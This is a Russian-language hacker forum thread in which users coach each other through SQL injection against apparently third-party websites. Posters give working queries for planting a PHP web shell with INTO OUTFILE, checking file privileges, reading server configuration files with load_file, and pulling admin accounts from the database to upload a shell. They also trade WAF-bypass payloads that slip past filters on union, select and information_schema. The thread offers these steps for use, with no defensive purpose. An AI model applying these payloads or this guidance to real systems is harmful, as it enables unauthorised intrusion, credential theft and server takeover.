15.10.2010, 03:32
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
С нами:
8750657
Репутация:
65
|
|
Сообщение от None
Для этого способа, директива allow_url_include должна находиться в положении On
где ее найти?? и можно ли ее включить?
|
|
|
15.10.2010, 03:44
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от KENT1994
где ее найти??
и можно ли ее включить?
Найти ее можно вызвав phpinfo или посмотреть в файле php.ini
А чем тебя первый способ не устроил?
|
|
|
|
15.10.2010, 03:48
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
С нами:
8750657
Репутация:
65
|
|
вроде залил , но теперь хз где искать
сделал так ---> INSERT INTO `hack` (`shell`) VALUES ("");
где теперь найти на сайте этот шелл(
|
|
|
|
15.10.2010, 03:54
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от KENT1994
вроде залил , но теперь хз где
искать
сделал так ---> INSERT INTO `hack` (`shell`) VALUES ("");
где теперь найти на сайте этот шелл(
Когда льешь через into outfile, ты должен указать абсолютный путь до папки с правами на запись, там и ищи.
Лучше лей через eval, так как allow_url_include, достаточно редко бывает в положении On.
|
|
|
|
15.10.2010, 04:01
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
С нами:
8750657
Репутация:
65
|
|
SELECT shell FROM `SS_id` INTO OUTFILE '/images/shell.php'; так?
я просто хз как найти папку для залива файлов шел во 2й раз заливаю
|
|
|
|
15.10.2010, 04:13
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от KENT1994
SELECT shell FROM `SS_id` INTO OUTFILE '/images/shell.php'; так?
Ну я не знаю какой у тебя путь, это тебе виднее. Если ты это прописал рандомом, то вероятно не так.
А если ты прочитал конфиги через load_file или нашел раскрытие путей, то так.
У тебя вообще права есть на чтение и запись файлов?
Что то я уже начал сомневаться, судя по ошибке, что ты выложил, а потом удалил.
Сделай запрос в phpmyadmin
Код HTML:
SELECT user() FROM mysql.user
выдаст тебе юзера, под которым работает БД
Потом сделай запрос
Код HTML:
SELECT file_priv FROM mysql.user WHERE user = 'имя юзера'
Если получишь Y, значит права есть. Следовательно, ты можешь читать файлы через load_file() и писать в них, дальше попробуй прочитать конфиги сервера.
Код HTML:
SELECT load_file('/etc/apache2/httpd.conf')
и тд, там ты найдешь путь.
Стандартные пути для файлов конфигурации, ты можешь найти по ссылке /thread49775-Default.html
Либо ищи раскрытие путей.
Некоторые варианты, как это можно сделать описаны мной вот тут /showpost.php?p=2324984&postcount=4
Какая вообще твоя цель? Шелл залить? Ты можешь достать из базы акк админа и попробывать залить через админку. Как это сделать обсуждалось выше.
|
|
|
|
15.10.2010, 04:33
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
С нами:
8750657
Репутация:
65
|
|
сенкс за урок, после техникума домучаюсь
|
|
|
|
15.10.2010, 07:01
|
|
Новичок
Регистрация: 26.02.2010
Сообщений: 7
С нами:
8529727
Репутация:
0
|
|
Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.
union(SELECT+1,table_name,3,4,5)from(iNformation_s chema.tabl%00es) Вот так не работает.
union(SELECT+1,version(),3,4,5) так работает.
Посоветуйте что-либо плиз.
Спасибо.
|
|
|
|
15.10.2010, 09:35
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Попробуй:
1 - /*!запрос*/
2 - использовать метод POST
|
|
|
|
15.10.2010, 09:49
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от nullik
Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.
union(SELECT+1,table_name,3,4,5)from(iNformation_s chema.tabl%00es) Вот так не работает.
union(SELECT+1,version(),3,4,5) так работает.
Посоветуйте что-либо плиз.
Спасибо.
Может быть ты имел ввиду
Код HTML:
union+(select+1,2,table_name,4,5+from+(information_schema.tables))
Пробуй так:
Код:
from+information_schema.`tables`
Код:
from+/*!information_schema.tables*/
И с чего ты взял, что там фильтруется именно union select information_schema.tables, а не например union select from?
Вот варианты на случай, если фильтруется union select from /showpost.php?p=2289579&postcount=14623, ну и если фильтруется и то и другое.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
